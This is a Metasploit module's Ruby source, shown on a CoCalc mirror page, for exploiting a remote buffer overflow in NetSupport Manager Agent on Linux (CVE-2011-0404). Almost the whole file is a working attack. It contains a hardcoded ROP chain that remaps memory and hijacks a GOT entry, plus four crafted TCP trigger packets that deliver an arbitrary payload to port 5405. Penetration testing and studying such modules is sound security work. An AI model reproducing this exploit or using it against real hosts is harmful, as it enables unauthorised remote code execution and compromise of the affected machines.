Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/misc/netsupport_manager_agent.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'NetSupport Manager Agent Remote Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in NetSupport Manager Agent. It

18
          uses a similar ROP to the proftpd_iac exploit in order to avoid non executable stack.

19
        },

20
        'Author' => [

21
          'Luca Carettoni (@_ikki)', # original discovery / exploit

22
          'Evan',  # ported from exploit-db exploit

23
          'jduck'  # original proftpd_iac ROP, minor cleanups

24
        ],

25
        'Arch' => ARCH_X86,

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2011-0404' ],

29
          [ 'OSVDB', '70408' ],

30
          [ 'BID', '45728' ],

31
          [ 'URL', 'https://seclists.org/fulldisclosure/2011/Jan/90' ],

32
          [ 'EDB', '15937' ]

33
        ],

34
        'Privileged' => true,

35
        'Platform' => 'linux',

36
        'Payload' => {

37
          'Space' => 0x975,

38
          'BadChars' => "",

39
          'DisableNops' => true,

40
        },

41
        'Targets' => [

42
          [

43
            'linux',

44
            {

45
              'Ret' => 0x0805e50c, # pop eax ; pop ebx ; pop ebp ;;

46
              'Pad' => 975,

47
              'RopStack' =>

48
                [

49
                  ### mmap isn't used in the binary so we need to resolve it in libc

50
                  0x00041160, # mmap64 - localtime

51
                  0xa9ae0e6c, # 0x8092b30 - 0x5e5b1cc4, localtime will become mprotect

52
                  0xcccccccc,

53
                  0x08084662, # add    DWORD PTR [ebx+0x5e5b1cc4],eax; pop edi; pop ebp ;;

54
                  0xcccccccc,

55
                  0xcccccccc,

56
                  0x080541e4, # localtime@plt (now mmap64)

57
                  0x080617e3, # add esp 0x10 ; pop ebx ; pop esi ; pop ebp ;;

58
                  0, 0x20000, 0x7, 0x22, 0xffffffff, 0, # mmap64 arguments

59
                  0x0, # unused

60
                  0x08066332, # pop edx; pop ebx; pop ebp ;;

61
                  "\x89\x1c\xa8\xc3".unpack('V').first, # mov [eax+ebp*4], ebx

62
                  0xcccccccc,

63
                  0xcccccccc,

64
                  0x080555c4, # mov [eax] edx ; pop ebp ;;

65
                  0xcccccccc,

66
                  # 0x0807385a, # push eax ; adc al 0x5d ;;

67


68
                  ### this is  the stub used to copy shellcode from the stack to

69
                  ### the newly mapped executable region

70
                  # \x8D\xB4\x24\x7D\xFB\xFF      # lea esi,[dword esp-0x483]

71
                  # \x8D\x78\x12                  # lea edi,[eax+0x12]

72
                  # \x6A\x7F                      # push byte +0x7f

73
                  # \x59                          # pop ecx

74
                  # \xF3\xA5                      # rep movsd

75


76
                  ### there are no good jmp eax so  overwrite getrlimits GOT entry

77
                  0x0805591b, # pop ebx; pop ebp ;;

78
                  0x08092d68 - 0x4, # 08092d68  0002f007 R_386_JUMP_SLOT   00000000   getrlimit

79
                  0x1,        # becomes ebp

80
                  0x08084f38, # mov [ebx+0x4] eax ; pop ebx ; pop ebp ;;

81
                  0xfb7c24b4, # become eb

82
                  0x01,

83
                  0x08054ac4, # <getrlimit@plt>

84
                  0x0805591b, # pop ebx; pop ebp ;;

85
                  # 0xffff8d78, # become ebx

86
                  0x788dffff,

87
                  0x2,

88
                  0x08054ac4, # <getrlimit@plt>

89
                  0x0805591b, # pop ebx; pop ebp ;;

90
                  0x597f6a12,

91
                  0x3,

92
                  0x08054ac4, # <getrlimit@plt>

93
                  0x0805591b, # pop ebx; pop ebp ;;

94
                  0x9090a5f2,

95
                  0x4,

96
                  0x08054ac4, # <getrlimit@plt>

97
                  0x0805591b, # pop ebx; pop ebp ;;

98
                  0x8d909090,

99
                  0x0,

100
                  0x08054ac4, # <getrlimit@plt>

101
                  0xcccccccc,

102
                  0x01010101,

103
                ]

104
            }

105
          ]

106
        ],

107
        'DisclosureDate' => '2011-01-08',

108
        'DefaultTarget' => 0,

109
        'Notes' => {

110
          'Reliability' => UNKNOWN_RELIABILITY,

111
          'Stability' => UNKNOWN_STABILITY,

112
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

113
        }

114
      )

115
    )

116


117
    register_options(

118
      [

119
        Opt::RPORT(5405),

120
      ]

121
    )

122
  end

123


124
  def exploit

125
    connect

126


127
    # pop_eax_ebx ;

128
    # 0x8084662 # add    DWORD PTR [ebx+0x5e5b1cc4],eax ;;

129
    triggerA = "\x15\x00\x5a\x00" + "\x41" * 1024 + "\x00\x00\x00" +

130
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

131


132
    triggerB = "\x25\x00\x51\x00\x81\x41\x41\x41\x41\x41\x41\x00" +

133
               "\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

134
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

135
               "\x00\x00\x00"

136


137
    triggerC = "\x37\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x58\xb4" +

138
               "\x92\xff\x00\x00\x69\x6b\x6b\x69\x00\x57\x4f\x52" +

139
               "\x4b\x47\x52\x4f\x55\x50\x00\x3c\x3e" + # pleasure trail

140
               # "\xcc" +

141
               "\x90" +

142
               payload.encoded +

143
               "\xcc" * (target['Pad'] - payload.encoded.length) +

144
               [target.ret].pack('V')

145


146
    new = ''

147
    if target['RopStack']

148
      new << target['RopStack'].map { |e|

149
        if e == 0xcccccccc

150
          rand_text(4).unpack('V').first

151
        else

152
          e

153
        end

154
      }.pack('V*')

155
    end

156


157
    triggerC << new

158
    triggerC << "\x00" * 4

159
    triggerC << "\x00\x00\x31\x32\x2e\x36\x32\x2e\x31\x2e\x34\x32"

160
    triggerC << "\x30\x00\x31\x30\x00\x00"

161


162
    triggerD = "\x06\x00\x07\x00\x20\x00\x00\x00\x0e\x00\x32\x00" +

163
               "\x01\x10\x18\x00\x00\x01\x9f\x0d\x00\x00\xe0\x07" +

164
               "\x06\x00\x07\x00\x00\x00\x00\x00\x02\x00\x4e\x00" +

165
               "\x02\x00\xac\x00\x04\x00\x7f\x00\x00\x00"

166


167
    print_status("Sending A")

168
    sock.put(triggerA)

169
    select(nil, nil, nil, 1)

170


171
    print_status("Sending B")

172
    sock.put(triggerB)

173
    select(nil, nil, nil, 1)

174


175
    print_status("Sending C")

176
    sock.put(triggerC)

177
    select(nil, nil, nil, 1)

178


179
    print_status("Sending D")

180
    sock.put(triggerD)

181
    select(nil, nil, nil, 1)

182


183
    disconnect

184
  end

185
end

186


187